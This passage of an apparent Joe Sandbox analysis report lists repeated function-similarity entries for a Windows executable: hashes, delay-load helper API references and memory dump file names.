              • Opcode ID: 2b296752f37f577b5f31ab66891849684bc63a572f61b5e8fd62a1ee9559f92e
              • Instruction ID: 5423f401b09b7daa0f0319701ba84ed9047ec86745d13a1e67060973a6e51e48
              • Opcode Fuzzy Hash: 2b296752f37f577b5f31ab66891849684bc63a572f61b5e8fd62a1ee9559f92e
              • Instruction Fuzzy Hash: 78B012D2B6C102BE3108750C7C16D36130DC8D1B20330C11BF44FD53C1D8409C0D4631
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0779079d8121b808e3371bbdae448aae1d3a65716a6fc4350d0b9e6d6ded27cd
              • Instruction ID: 64cfec0c4d8afbdf13b13726c4b63c7c8600d3e2128ed29499d791e07ddbc0e9
              • Opcode Fuzzy Hash: 0779079d8121b808e3371bbdae448aae1d3a65716a6fc4350d0b9e6d6ded27cd
              • Instruction Fuzzy Hash: F8B012D6B6C202BE3108710C7C56D3F130DD8D0B20330401BB04BD52C1D8409C084631
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2eb721f98778cee6ea3443e081b71c4609b2d1726da93084be7059b45a64aa9c
              • Instruction ID: 7cf2cc639224b8ef24b603bded40461cab5c2c428d8e81ec8c28d7501962f239
              • Opcode Fuzzy Hash: 2eb721f98778cee6ea3443e081b71c4609b2d1726da93084be7059b45a64aa9c
              • Instruction Fuzzy Hash: 9DB012E2B6C102BE310C710C7D16D36139DC8D0B20330401BB04BE52C1D8409C094531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a91b8f2e992c0b79d785cfa1a779348ee03daf5e9c4b8e7cfcaa38407a819738
              • Instruction ID: 777da26c7cfb9e8731023ddfd5181fe8e072687d99c9100cde7e099247705627
              • Opcode Fuzzy Hash: a91b8f2e992c0b79d785cfa1a779348ee03daf5e9c4b8e7cfcaa38407a819738
              • Instruction Fuzzy Hash: F5B012E2B6D602BE3148720C7C16D36130FC8D0B20330451BB04BD52C1D8409C484531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 003804bc1211735e77e619c39d326e51eba477c2e2ede05aa66bc72101364a03
              • Instruction ID: 0ce54aa6f43560bc36fcd6e152db250db9539da656ac0b8b7e88a92ca935add2
              • Opcode Fuzzy Hash: 003804bc1211735e77e619c39d326e51eba477c2e2ede05aa66bc72101364a03
              • Instruction Fuzzy Hash: 35B012D2B6D502BE3108710C7C16D36130FC8D1B20330811BF44BD52C1D8409C084531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 61cb501ab9f66c157922ca06e31c701f5bd0e1f96052c61908d26e545af43ff8
              • Instruction ID: 5b68302be5511f33bde76ee8a5c6bfdcf91408e42e3ef50c587c0210761b246d
              • Opcode Fuzzy Hash: 61cb501ab9f66c157922ca06e31c701f5bd0e1f96052c61908d26e545af43ff8
              • Instruction Fuzzy Hash: C6B012D2B7D502BE3108710C7C16D36234FCCD0B20330401BB04BD52C1D8409C084531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6c58cb49c4d36c4cabaedc791699987d799b22029210cfec97d02fb71d4068df
              • Instruction ID: 2ecb0bd3632693bc0604ebd0b9da355035fcc6cbe7147d2f7a541f5be77b72c8
              • Opcode Fuzzy Hash: 6c58cb49c4d36c4cabaedc791699987d799b22029210cfec97d02fb71d4068df
              • Instruction Fuzzy Hash: 15B012D2B6C102BE3108711C7C16D36135DC8D1B20330811BF54BD52C1D9409C084531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6e1236c772c7b24b0fb45e0a998568c1c1fdc968ad3d0070c84642f49e38ce7d
              • Instruction ID: e49dad6ae2f4fb0089532d0b8b9f84a5cc604c8d66a0f7ba0bb1c503cfd21235
              • Opcode Fuzzy Hash: 6e1236c772c7b24b0fb45e0a998568c1c1fdc968ad3d0070c84642f49e38ce7d
              • Instruction Fuzzy Hash: F7B012D276C002BE310871457C02E3E224FC4D4B20330851BB00BC0145D8448C0D4631
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ace21c8c3e6b29145fe9aa36da56f25dd963a086e7ebd3e32bf4ed0c573af2d6
              • Instruction ID: ae273284e2020264b1091d78fcb4b1a7b8ee686b58683fe402fb2afc4864b8d7
              • Opcode Fuzzy Hash: ace21c8c3e6b29145fe9aa36da56f25dd963a086e7ebd3e32bf4ed0c573af2d6
              • Instruction Fuzzy Hash: F3B012E276C002FE31087145BC02D3A225EC8D0F20330C21BB44BC0145D8488C084631
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1b1a240748599e77fa7334ead4a8f54d93609b0142df4ee84de4577978cf8184
              • Instruction ID: e538cc2573ef73e9a2574fdf7b6c5edce4c375e72b0d61867238e16e8743987d
              • Opcode Fuzzy Hash: 1b1a240748599e77fa7334ead4a8f54d93609b0142df4ee84de4577978cf8184
              • Instruction Fuzzy Hash: 64B012D67AC002AE3108711C3C07E76122ED4C0B20330402BB00BC0540DE408C0C8231
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1380b30ce249a50dd778b1a232570a526bb103230a4eecf2d669f6922e5c5fe2
              • Instruction ID: 5b3955f8b179d8108c4dd193402b491ad325b96763b8f3104ad6533831a0282a
              • Opcode Fuzzy Hash: 1380b30ce249a50dd778b1a232570a526bb103230a4eecf2d669f6922e5c5fe2
              • Instruction Fuzzy Hash: ADB012D67BC107BE320831043C07C77122DC4C0B20330452BB006D4040DE408C4C8131
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 43ad39ae7831f745f6ad95808611dbbb424cb492ee2955570539ee95d95b0006
              • Instruction ID: 0e2bbe8f34006eaf23b01442075875c586f37bf2679ab61649b13277d76df408
              • Opcode Fuzzy Hash: 43ad39ae7831f745f6ad95808611dbbb424cb492ee2955570539ee95d95b0006
              • Instruction Fuzzy Hash: ECB012D67AC043AE310C71083D07D77122DC5C0B20330801BB10AC4140DE408C098231
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7130b140cd985bb256b69c8fd18b0cb828e1ffa77cc1cfbf57648104f2bfe5a7
              • Instruction ID: 2ffeddd9b94576ec08f730842c26660d4aa3a4ff4768504f2728834291fe4cdc
              • Opcode Fuzzy Hash: 7130b140cd985bb256b69c8fd18b0cb828e1ffa77cc1cfbf57648104f2bfe5a7
              • Instruction Fuzzy Hash: F5B012D67AC003EE310C71083C07D77123DC4C0B20330811BB40AC5184DE408C0C8231
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 982e1ee3d739db2ec4a5347fa8a656fe173cd6d311ba8dd2b6891d52c00baa29
              • Instruction ID: 73dc674ee60b3ef00ae33682fa566f9902299e102d24ca8835feb7a07795577c
              • Opcode Fuzzy Hash: 982e1ee3d739db2ec4a5347fa8a656fe173cd6d311ba8dd2b6891d52c00baa29
              • Instruction Fuzzy Hash: A1B012D27AC102BE310871457C03E3F224FD4D0B20330411BB00BC0145D8448C084731
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2945b1493c01d14449f95b84ecfc3110050ef6d9509f58c6ab95c60d17e09d7d
              • Instruction ID: d512f3beb7dd538ba83d653d8b9f24778beb87e86263914a149f23821220dee4
              • Opcode Fuzzy Hash: 2945b1493c01d14449f95b84ecfc3110050ef6d9509f58c6ab95c60d17e09d7d
              • Instruction Fuzzy Hash: A3B012D6B6C202AE310CB1187C02D76122DC4D9B20330861BF50AD0150DA809C088131
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
